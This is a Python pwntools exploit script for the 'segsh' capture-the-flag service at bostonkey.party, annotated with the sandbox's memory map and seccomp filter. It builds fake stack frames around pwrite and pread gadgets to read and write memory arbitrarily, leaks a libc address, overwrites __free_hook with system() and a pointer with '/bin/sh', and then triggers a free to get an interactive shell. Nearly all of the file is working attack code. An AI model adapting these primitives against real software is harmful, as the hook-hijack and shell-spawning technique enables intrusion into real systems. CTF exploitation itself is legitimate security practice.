#thread mem:
#   00000-02000:---:ldt2:
#1. 00000-02000:RWX:Text:CC
#   02000-14000:---:ldt0:ds,es,fs
#2. 12000-14000:RW-:Data
#   14000-1C000:RWX:????
#   1C000-2C000:RWX:ldt1:ss
#3. 24000-2C000:RW-:Stack
# ecx translation
#   00000-08000:Code, disallowed
#   08000-10000:Stack + ecx -  8000
#   10000-     :Data  + ecx - 10000
# seccomp filter (BPF) recovered from the sandbox: the accumulator holds the
# syscall number, so only nr 3, 4 and 1 (i386 read, write, exit) are allowed
# and anything else is killed.
# [0] ld [0]                ; jt = 0; jf = 0; k = 0;
# [1] je #3, l2, l3         ; jt = 0; jf = 1; k = 3;
# [2] ret SECCOMP_RET_ALLOW ; jt = 0; jf = 0; k = 0x7FFF0000;
# [3] je #4, l4, l5         ; jt = 0; jf = 1; k = 4;
# [4] ret SECCOMP_RET_ALLOW ; jt = 0; jf = 0; k = 0x7FFF0000;
# [5] je #1, l6, l7         ; jt = 0; jf = 1; k = 1;
# [6] ret SECCOMP_RET_ALLOW ; jt = 0; jf = 0; k = 0x7FFF0000;
# [7] ret SECCOMP_RET_KILL  ; jt = 0; jf = 0; k = 0
from pwn import *
#s = process(['./segsh', '99999'])
s = remote('segsh.bostonkey.party', 8888)

# Walk the service's '__' prompt: install the echo handler, then exec it,
# and stop once it asks for the string to echo.
for cmd in ('install -i echo', 'exec -e echo'):
    s.recvuntil('__')
    s.sendline(cmd)
s.recvuntil('string: ')

# Offsets used when building fake frames below. They are specific to this
# challenge build; presumably they fall inside the 00000-02000 Text mapping
# listed in the header (confirm against the binary).
# NOTE(review): `exit` shadows the builtin exit(); it is not referenced in
# the rest of this script.
exit = 0x10
syscall = 0x15
g1 = 0x69       # pop eax; pop ebx; pop edx; pop ecx; leave; ret;
pread = 0x6f
pwrite = 0x4d
leave = 0x4b
#gdb.attach(s)
def read(offset, size=0x1000):
    """Leak ``size`` bytes at ``offset`` through the pwrite gadget.

    The fake frame is 1016 filler bytes, a saved ebp, the pwrite address,
    a return slot, then pwrite's data/len arguments, followed by the marker
    ``POOP``. Once the marker has come back from the service, the next
    ``size`` bytes are taken as the leaked data and returned.

    ``offset`` is packed signed, so negative values are accepted; how the
    handler interprets it is described by the ecx translation table in the
    header. Uses the module-level connection ``s`` and offset ``pwrite``.
    """
    frame = [
        '\xcc' * 1016,
        p32(0xa000),                  # saved ebp
        p32(pwrite),                  # return address -> pwrite
        p32(0),                       # pwrite's own return slot
        p32(offset, sign='signed'),   # data
        p32(size),                    # len
        'POOP',
    ]
    s.send(''.join(frame))
    s.recvuntil('POOP')
    return s.recvn(size)
def write(offset, data):
    """Write ``data`` to ``offset`` through the pread gadget.

    Same frame layout as read() but with pread as the target: saved ebp,
    pread's address, a return slot, the destination and ``len(data)``,
    then the marker ``CACA``. The payload itself goes out in a second
    send() after a short pause; the call returns (None) once the marker
    has come back. Uses the module-level connection ``s`` and ``pread``.
    """
    frame = [
        '\xcc' * 1016,
        p32(0xa000),                  # saved ebp
        p32(pread),                   # return address -> pread
        p32(0),                       # pread's own return slot
        p32(offset, sign='signed'),   # data
        p32(len(data)),               # len
        'CACA',
    ]
    s.send(''.join(frame))
    # Timing-dependent: presumably lets the frame be consumed before the
    # payload arrives -- confirm against the service.
    sleep(0.1)
    s.send(data)
    s.recvuntil('CACA')
# Addresses below were found through earlier memory scanning (presumably
# with read() above); they are specific to this challenge build.
base = 0x1f6000
libc_base = 0x1b000

# Leak a pointer into libc (taken to be free) and derive libc's load address.
libc_free = u32(read(base + 0x4F94, 0x4))
libc = libc_free - 0x76C60
print(hex(libc))

# Replace the package description pointer with libc+0x160A24 ("/bin/sh"
# per the original note), then __free_hook with system().
write(base + 0x5018, p32(libc + 0x160A24))
write(libc_base + 0x1AB8D8, p32(libc + 0x40190))

# Leave the echo handler and install/uninstall a package; the uninstall is
# presumably what frees the description and reaches the hook.
s.sendline('cya')
for cmd in ('install -i hello', 'uninstall -u hello'):
    s.recvuntil('__')
    s.sendline(cmd)
sleep(0.5)
s.interactive()